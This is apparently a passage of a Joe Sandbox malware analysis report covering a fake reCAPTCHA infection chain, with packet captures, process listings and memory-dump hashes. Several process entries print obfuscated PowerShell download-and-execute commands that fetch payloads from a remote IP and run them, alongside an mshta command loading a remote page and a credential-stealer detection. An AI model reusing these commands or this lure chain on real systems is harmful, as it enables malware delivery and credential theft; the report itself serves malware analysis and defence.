Jan 15, 2025 10:09:10.062475920 CET	1236	IN	Data Raw: 67 53 4e 36 76 49 6d 45 51 41 41 49 66 48 6d 51 4b 49 42 69 73 75 74 55 67 56 46 49 32 6d 32 45 6c 45 77 63 66 45 46 35 46 45 41 41 41 41 4d 45 41 41 41 43 43 41 51 41 41 51 67 45 41 41 41 55 41 41 41 43 71 2f 2f 2f 2f 4b 77 49 41 41 4e 51 41 41 Data Ascii: gSN6vImEQAAIfHmQKIBisutUgVFI2m2ElEwcfEF5FEAAAAMEAAACCAQAAQgEAAAUAAACq////KwIAANQAAAA4AAAACAIAAHICAAAcAAAA7wAAAKYAAABcAQAAQwIAAFIAAAA4bQIAAAZuGGouCCC9MCuLJSsGIAswqp0lJiuTAiD///8/XxAAEQcgLnREhVog3XrN0WE4d////xeNAQAAGw0RByCQmksPWiAZ+82nYThd////fg
Jan 15, 2025 10:09:10.062489033 CET	1236	IN	Data Raw: 6d 46 6a 53 78 4a 53 59 34 54 2f 2f 2f 2f 78 45 48 49 45 78 63 2b 6a 56 61 49 4b 41 55 6d 43 6c 68 4f 44 7a 2f 2f 2f 39 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 66 67 45 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 52 35 69 59 48 34 42 41 Data Ascii: mFjSxJSY4T////xEHIExc+jVaIKAUmClhODz///9+AQAABAIlF1gQAOCRfgEAAAQCJRdYEADgkR5iYH4BAAAEAiUXWBAA4JEfEGJgfgEAAAQCJRdYEADgkR8YYmATBH4BAAAEAiUXWBAA4JF+AQAABAIlF1gQAOCRHmJgfgEAAAQCJRdYEADgkR8QYmB+AQAABAIlF1gQAOCRHxhiYBMF0AEAABsoegEABihwAgAGEQUomQIABh
Jan 15, 2025 10:09:10.062500000 CET	1236	IN	Data Raw: 34 4c 76 37 2f 2f 33 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 46 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 6d 4a 67 66 67 45 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 52 38 51 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 Data Ascii: 4Lv7//34BAAAEAiUXWBAA4JF+AQAABAIlF1gQAOCRHmJgfgEAAAQCJRdYEADgkR8QYmB+AQAABAIlF1gQAOCRHxhiYBMEEQcgmHQHvFogTOnfTGE42v3//9ABAAAbKHoBAAYocAIABhEFKJkCAAYTBn4BAAAEAhEGFhEEGlkofgEABhEHIA2IBp5aIHdvraVhOJ39//8SAf4VAQAAGxEHIFLA+g1aIGJEynhhOIL9//8CGGIQAA
Jan 15, 2025 10:09:10.062511921 CET	1236	IN	Data Raw: 54 42 64 41 42 41 41 41 62 4b 48 6f 42 41 41 59 6f 63 41 49 41 42 68 45 46 4b 4a 6b 43 41 41 59 54 42 6e 34 42 41 41 41 45 41 68 45 47 46 68 45 45 47 6c 6b 6f 66 67 45 41 42 68 45 48 49 4e 69 4a 37 61 74 61 49 46 47 4e 61 31 31 68 4f 47 33 39 2f Data Ascii: TBdABAAAbKHoBAAYocAIABhEFKJkCAAYTBn4BAAAEAhEGFhEEGlkofgEABhEHINiJ7ataIFGNa11hOG39//8CIP///z9fEAACGGIQABEHIAJahUhaIE246W1hOEz9//8CHx5kChEHIDI3x+haIGI7kH5hODT9//8RByDFzIZBWiDHSLoZYTgh/f//ByoAAAATMAgA9QQAAAUAABEgcAAAAAogxUI+8iBPmDDbYSUTDB8jXkUjAA
Jan 15, 2025 10:09:10.062526941 CET	1236	IN	Data Raw: 73 79 64 43 73 4a 53 73 47 49 45 31 61 51 6f 41 6c 4a 6a 6a 31 2f 50 2f 2f 46 68 4d 4a 49 4e 51 6a 6a 4c 6f 34 36 50 7a 2f 2f 78 38 51 4b 41 6f 43 41 41 59 54 42 78 45 4d 49 4d 51 76 6b 6c 4e 61 49 50 4e 46 33 52 52 68 4f 4d 7a 38 2f 2f 38 52 42 Data Ascii: sydCsJSsGIE1aQoAlJjj1/P//FhMJINQjjLo46Pz//x8QKAoCAAYTBxEMIMQvklNaIPNF3RRhOMz8//8RBxEJBxEFEQlYlZ4g59rCrTi2/P//Bhpa4Ci8AQAGEwgRDCDn8ZNjWiCQKLU7YTiY/P//EQQXWBMEEQwgh/tfV1ogSBq+xGE4f/z//xEHGREHGZUIGZVhnhEMIM5LGmRaIM/poDJhOGD8//8gXq8gaQ0WEwQRDCDKpD
Jan 15, 2025 10:09:10.067409992 CET	1236	IN	Data Raw: 59 57 69 44 4a 75 4d 30 5a 59 54 6a 2b 2f 76 2f 2f 41 77 4e 37 43 41 41 41 42 42 35 69 41 33 73 4b 41 41 41 45 4b 46 34 43 41 41 59 6c 4a 74 4a 67 66 51 67 41 41 41 51 44 4a 58 73 4a 41 41 41 45 48 6d 4a 39 43 51 41 41 42 41 63 67 64 53 53 43 47 Data Ascii: YWiDJuM0ZYTj+/v//AwN7CAAABB5iA3sKAAAEKF4CAAYlJtJgfQgAAAQDJXsJAAAEHmJ9CQAABAcgdSSCGFogMdD6C2E4wf7//wMlewkAAAQeYn0JAAAEByDNHZEjWiCCi0RpYTih/v//AyV7CQAABAZZfQkAAAQgYUxpzjiJ/v//A3sJAAAEIAAAAAE0CCA626lfJSsGILM4QB8lJgcgFZpp4FphOGD+//8XKgADMAkABwAAAA

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	92.255.57.120	443	6488	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 09:09:05 UTC	341	OUT	GET /recaptcha-verify.html HTTP/1.1 Accept: / Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: view-reserve.com Connection: Keep-Alive
2025-01-15 09:09:06 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 09:09:05 GMT Content-Type: text/html Content-Length: 31911 Last-Modified: Sun, 12 Jan 2025 14:57:08 GMT Connection: close ETag: "6783d844-7ca7" X-Content-Type-Options: nosniff Accept-Ranges: bytes
2025-01-15 09:09:06 UTC	16122	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2025-01-15 09:09:06 UTC	15789	IN	Data Raw: 71 53 0f 5a 43 4e 45 55 32 53 13 63 77 54 2b 53 17 7f 6d 59 7a 64 4e 4e 53 1c 4e 7c 59 71 53 75 53 20 4b 52 4e 55 53 24 78 71 58 14 4e 59 55 33 4e 5b 4f 75 4a 72 53 2c 4e 09 4f 5c 27 59 1a 62 3f 4e 63 53 34 4e 65 61 5b 70 68 53 38 4e 69 60 71 4e 6c 61 66 74 0b 53 3e 63 52 4e 71 49 23 5e 34 59 33 4e 75 57 71 54 35 5a 15 53 47 4f 75 61 7a 4f 78 4e 50 5c 5c 51 59 42 63 52 4a 1c 59 14 62 2d 4d 03 59 4a 4d 06 59 7e 4d 08 5c 5c 0f 4e 1f 60 18 4a 3c 5c 5c 1e 4d 5c 72 60 1e 4d 0f 69 37 4d 11 59 5c 5c 4c 69 59 60 4d 16 53 67 4d 19 59 68 60 35 49 30 4d 1f 58 07 53 73 59 07 53 76 61 1a 4d 25 50 5e 53 7a 4d 28 59 7a 53 7f 52 47 4f 7e 4d 2f 55 09 52 06 61 30 52 08 4d 35 52 0b 60 63 58 0c 79 51 60 67 4d 3a 58 11 4d 3c 59 0e 58 15 52 17 53 1c 60 76 52 1b 64 79 4b 1e 7f Data Ascii: qSZCNEU2ScwT+SmYzdNNSN\|YqSuS KRNUS$xqXNYU3N[OuJrS,NO\'Yb?NcS4Nea[phS8Ni`qNlaftS>cRNqI#^4Y3NuWqT5ZSGOuazOxNP\\QYBcRJYb-MYJMY~M\\N`J<\\M\r`Mi7MY\\LiY`MSgMYh`5I0MXSsYSvaM%P^SzM(YzSRGO~M/URa0RM5R`cXyQ`gM:XM<YXRS`vRdyK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49711	104.102.49.254	443	7328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 09:09:12 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2025-01-15 09:09:13 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 15 Jan 2025 09:09:13 GMT Content-Length: 25665 Connection: close Set-Cookie: sessionid=aa43d1ebae0c2f87f653d5ac; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-15 09:09:13 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-15 09:09:13 UTC	11186	IN	Data Raw: 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 74 68 61 69 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 68 61 69 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e0 b9 84 e0 b8 97 e0 b8 a2 20 28 54 68 61 69 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: ?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a><a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a>

Target ID:	0
Start time:	04:09:01
Start date:	15/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:09:01
Start date:	15/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:09:03
Start date:	15/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html
Imagebase:	0x7ff744330000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:09:05
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	04:09:05
Start date:	15/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:09:05
Start date:	15/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:09:06
Start date:	15/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:09:06
Start date:	15/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:09:06
Start date:	15/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:09:06
Start date:	15/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:09:10
Start date:	15/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xfe0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:09:10
Start date:	15/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x750000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3294615870.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	04:09:10
Start date:	15/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xd00000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FF848F033B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062822636.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9895435140380c782189f81496fffaa590a70fd196a779c416207eeb9efb34d6
Instruction ID: 7751a646eaf869edea33559e4a2383cdbafb38eb3a9baaa8760fd3dac5d19060
Opcode Fuzzy Hash: 9895435140380c782189f81496fffaa590a70fd196a779c416207eeb9efb34d6
Instruction Fuzzy Hash: DE01677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056EE58AC3695DB36E882CB45

Analysis Process: mshta.exePID: 6488, Parent PID: 744COMMON

Executed Functions

Function 0000020E2D0C1F19 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.2083054826.0000020E2D0C1000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2D0C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_20e2d0c1000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f18645dcf0c63c7b7e6b573ddf2959d143f876985197ef9a4ee3b61a51ebd225
Instruction ID: a68a7a7ff483c8197b6657380ff5e78da1510a9f45cb8f5cf266e2d006d3dd13
Opcode Fuzzy Hash: f18645dcf0c63c7b7e6b573ddf2959d143f876985197ef9a4ee3b61a51ebd225
Instruction Fuzzy Hash: D3F1C22151DB845FEB56EB28845AB68BFE1EF1A300F0949DED9CACB1F3C515D882C346

Function 0000020E2D0C2CD6 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.2083054826.0000020E2D0C1000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2D0C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_20e2d0c1000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43b6a65aa0b405e55e82e552382372787124976d2c225d86a5722eb8ee5e4dd2
Instruction ID: aa2936c233ae27568873a32ba94d65f03c8f0aa303361deef73a42f72c27c61e
Opcode Fuzzy Hash: 43b6a65aa0b405e55e82e552382372787124976d2c225d86a5722eb8ee5e4dd2
Instruction Fuzzy Hash: 10E01A0164FBC45FD787A378096DB607FA19F57500B5E48CFE584CB1B3D81A8A26C312

Function 0000020E2D0C4B7B Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.2083003711.0000020E2D0C4000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2D0C4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_20e2d0c4000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae827f04151e4423935f5d0d163da8eb8cd7ce4191df2f03ce7840dc45204ae
Instruction ID: 8b56675505fcfd1e04026e3e084a910bee5a70c51feb59b55d23938f544d3633
Opcode Fuzzy Hash: dae827f04151e4423935f5d0d163da8eb8cd7ce4191df2f03ce7840dc45204ae
Instruction Fuzzy Hash: D1B0121181D7505EF6111170080C4182665C7552C0F2608834C01D7063ED149D820171

Function 0000020E2CF10F49 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2

Function 0000020E2CF10F21 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2

Function 0000020E2CF10F29 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2

Function 0000020E2CF10F11 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2

Function 0000020E2CF10F09 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_20e2cf10000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
Instruction ID: 1daa68fb27acbf7a63caefd88243fb7b492c37d536d62e6a4b47bf0807038a5b
Opcode Fuzzy Hash: ca422a9d2506abf35224966f5c11966c9c7e3f1b5122efb2938fa7b57db8961b
Instruction Fuzzy Hash: 9790020459550659E81411914E4A25C5085A388190FD94880581AA0545D48D02D612D2

Function 0000020E2CF10EF9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.2083332776.0000020E2CF10000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020E2CF10000, based on PE: false

Joe Sandbox IDA Plugin

